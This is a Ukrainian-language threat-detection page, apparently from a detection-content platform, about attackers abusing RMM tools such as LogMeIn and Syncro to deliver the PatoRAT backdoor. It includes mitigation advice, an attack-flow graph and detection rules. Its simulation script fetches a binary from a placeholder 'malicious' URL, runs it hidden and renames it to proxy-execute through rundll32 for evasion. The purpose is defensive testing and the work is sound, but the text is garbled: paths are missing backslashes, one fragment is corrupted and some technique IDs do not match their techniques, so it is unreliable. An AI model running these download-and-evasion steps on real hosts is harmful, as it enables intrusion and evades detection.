Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Актори загроз дедалі частіше зловживають легітимними інструментами віддаленого моніторингу та управління (RMM)—такими як LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne та SuperOps—для розповсюдження шкідливих програм і встановлення стійкого віддаленого доступу. Початкова доставка часто відбувається через зловмисні сторінки завантажень або фішингові електронні листи, після чого йде виконання через PowerShell і розгортання вторинних корисних навантажень, таких як бекдор PatoRAT. AhnLab EDR може виявити виконання цих утиліт RMM і генерувати оповіщення на основі поведінки підозрілої подальшої діяльності. Звіт підкреслює важливість перевірки походження програмного забезпечення та підтримки безперервного моніторингу кінцевих точок.
Розслідування
Центр безпеки AhnLab спостерігав кілька кампаній, у яких зловмисники перепаковували або маскували інсталятори RMM під популярні додатки (наприклад, Notepad++, 7-Zip і Telegram) і доставляли їх через зловмисні сайти або фішингові вкладення. Після встановлення агенти RMM реєструвалися у їхній інфраструктурі постачальника та далі використовувалися для виконання корисних навантажень PowerShell, які встановлювали PatoRAT. Подібна тактика спостерігалася у кількох продуктах RMM, включаючи Syncro, що постачалася через фішинг з PDF-приманками. Логіка виявлення AhnLab EDR була розроблена для позначення виконання цих, на перший погляд, легітимних бінарних файлів і кореляції їх з поведінкою після установки.
Пом’якшення
Перевірте джерела завантажень, підтвердіть сертифікати підпису коду та порівняйте хеші з офіційними релізами постачальника перед дозволом використання програмного забезпечення RMM у середовищі. Застосуйте списки дозволених застосунків та вимагайте явних дозволів для виконання RMM. Слідкуйте за несподіваними запусками бінарних файлів RMM, аномальною активністю PowerShell та підозрілими з’єднаннями з доменами інфраструктури постачальника, коли такі інструменти не санкціоновані. Оновлюйте операційні системи та засоби безпеки, щоб зменшити вплив.
Відповідь
Коли виявлено підозрюване виконання RMM, ізолюйте хост, зберіть судово-експертні артефакти та видаліть несанкціонований бінарний файл. Блокуйте вихідні з’єднання з інфраструктурою інструмента, щоб відсікати канали віддаленого управління, і проведіть повне сканування на наявність вторинних корисних навантажень, таких як PatoRAT. Оновіть контент для виявлення з виявленими IOC та повідомте SOC про паттерни кампанії для швидшого реагування.
“graph TB %% Визначення класів classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Вузли node_initial_access[“<b>Дія</b> – <b>T1204 Виконання користувача</b>: Жертви завантажують інсталятори RMM, замасковані під легітимне ПЗ або відкривають фішингові PDF-рахунки, що перенаправляють на зловмисні посилання.”] class node_initial_access action node_masquerading[“<b>Методика</b> – <b>T1036.008 Маскування</b>: Інсталятори та PDF підроблено так, щоб виглядати як надійні утиліти чи документи.”] class node_masquerading technique node_rmt_install[“<b>Інструмент</b> – <b>Назва</b>: Інструменти віддаленого доступу такі як LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps.”] class node_rmt_install tool node_powerShell[“<b>Методика</b> – <b>T1059.001 PowerShell</b>: Атакуючий запускає команди PowerShell через платформу RMM для завантаження та встановлення бекдора PatoRAT.”] class node_powerShell technique node_patoRAT[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: Бекдор PatoRAT.”] class node_patoRAT malware node_software_deployment[“<b>Методика</b> – <b>T1072 Інструменти розгортання програмного забезпечення</b>: RMM рішення використовуються для поширення додаткових зловмисних навантажень і підтримки постійності.”] class node_software_deployment technique node_lateral_exploit[“<b>Методика</b> – <b>T1210 Експлуатація віддалених сервісів</b>: Скомпрометовані інструменти RMM використовуються для відкриття віддалених сеансів і переміщення латерально по середовищу.”] class node_lateral_exploit technique node_rdp_hijack[“<b>Методика</b> – <b>T1563.002 Викрадення сеансу віддаленого сервісу</b>: Виконується викрадення RDP для отримання контролю над додатковими хостами.”] class node_rdp_hijack technique node_root_cert[“<b>Методика</b> – <b>T1553.004 Встановлення кореневого сертифіката</b>: Команди PowerShell встановлюють шкідливий кореневий сертифікат для обходу засобів безпеки.”] class node_root_cert technique %% З’єднання node_initial_access u002du002d>|веде до| node_masquerading node_masquerading u002du002d>|веде до| node_rmt_install node_rmt_install u002du002d>|використовує| node_powerShell node_powerShell u002du002d>|встановлює| node_patoRAT node_patoRAT u002du002d>|дозволяє| node_software_deployment node_software_deployment u002du002d>|полегшує| node_lateral_exploit node_lateral_exploit u002du002d>|дозволяє| node_rdp_hijack node_powerShell u002du002d>|виконує| node_root_cert “
Потік атак
Виявлення
Альтернативне програмне забезпечення віддаленого доступу / управління (через process_creation)
Перегляд
Можлива спроба встановлення програмного забезпечення SuperOps RMM (через file_event)
Перегляд
Альтернативне програмне забезпечення віддаленого доступу / управління (через audit)
Перегляд
Альтернативне програмне забезпечення віддаленого доступу / управління (через system)
Перегляд
Виявлення експлуатації інструменту RMM для розповсюдження шкідливого ПЗ [Windows Process Creation]
Перегляд
Виконання симуляції
Обов’язкова умова: Перевірка телеметрії та базового рівня повинна бути успішною.
Обґрунтування: Цей розділ детально описує точне виконання тактики супротивника (TTP), розроблене для запуску правила виявлення. Команди й наратив МАЮТЬ безпосередньо відображати виявлені TTP і націлені на створення точного телеметрії, яку очікує логіка виявлення. Абстрактні або непо ilarated приклади призведуть до неправильної діагностики.
-
Сценарій атаки та команди:
Атакуючий надсилає фішинговий електронний лист, що містить зловмисне вкладення. Вкладення виконує сценарій PowerShell, який завантажує бінарний файл RMMLogMeIn.exetoC:Temp. Щоб уникнути виявлення на основі імені, атакуючий перейменовує бінарний файл уtool.exeі запускає його черезrundll32.exe(T1216). Бінарний файл RMM потім контактує з сервером C2 під контролем атакуючого і викидає бекдорне навантаження. Після виконання атакуючий видаляє бінарний файл (T1542.004), щоб приховати сліди. -
Скрипт регресійного тестування:
# --------------------------------------------------------------- # Симулювати експлуатацію інструменту RMM (оригінальне ім'я) – повинен викликати тригер # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Виконання оригінального бінарного файлу RMM (очікувано оповіщення)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Симулювати ухилення шляхом перейменування та проксі-виконання – НЕ повинен викликати тригер # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Виконання перейменованого бінарного файлу RMM через rundll32 (ухилення)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Очищення артефактів # --------------------------------------------------------------- Write-Host "[*] Очищення бінарних файлів..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Симуляція завершена." -
Команди очищення:
# Переконайтеся, що всі залишкові процеси завершено Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити всі завантажені файли (якщо вони все ще є) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue